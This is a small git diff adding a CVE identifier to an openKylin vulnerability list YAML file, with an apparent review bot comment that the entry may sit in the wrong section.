diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 211571f6..85d3766d 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -182,3 +182,5 @@ kve:
 - KVE-2022-0206
 kylin-activation:
 - KVE-2022-0231
+ XML:
+ - CVE-2023-24055
\ No newline at end of file
-- Gitee
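Review bot: The hunk header puts this addition in the `kve:` section, directly after the `kylin-activation` entry `KVE-2022-0231`, yet the id being added is a CVE. The indentation is not recoverable here, but if `XML:` nests under `kve:` the entry sits in the wrong list and a lookup by CVE id would miss it. Patch 11/23 registered the other third-party product of this series in other_list.yaml, so this one probably belongs there too, or under this file's CVE section if it has one.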